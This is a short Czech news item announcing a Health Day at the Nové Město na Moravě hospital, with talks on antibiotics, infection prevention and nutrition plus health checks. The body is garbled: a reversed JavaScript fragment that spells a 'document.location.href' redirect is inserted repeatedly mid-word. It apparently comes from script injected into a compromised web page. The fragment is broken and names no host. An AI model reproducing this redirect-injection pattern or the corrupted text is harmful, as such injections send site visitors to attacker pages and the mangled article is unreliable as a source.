Rainbow page separator

Nemocnice v dubnu pro veřejnost uspořádá Den zdraví

Neděle, 27. března 2016

Nemocnice Nové Město na Moravě, Žďárská ulice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Den zdraví je naplánován v novoměstské nemocnici na 7. dubna. Uskuteční se v přízemí chirurgického pavilonu. Speciální program zahrne přednášku primáře infekčního oddělení Miloslava Šťastníka o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, kdy je vhodné brát antibiotika, epidemiologická sestra Šárka Vidergo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová pohovoří o nejjednodušší prevenci infekčních nemocí a výživová poradkyně Jarmila Kašparová o stravování v jarních měsících.
V rámci Dne zdraví si budou moci zájemci dát změřit krevní tlak či si nechat zkontrolovat čis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totu rukou. Odborníci pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomným poradí také například jak provést samovyšetření prsu, preventivní cviky při inkontinenci a k dispozici bude i možnost porady s výživovou poradkyní či prezentace produktů nemocniční lékárny a skladu zdravotnického materiálu.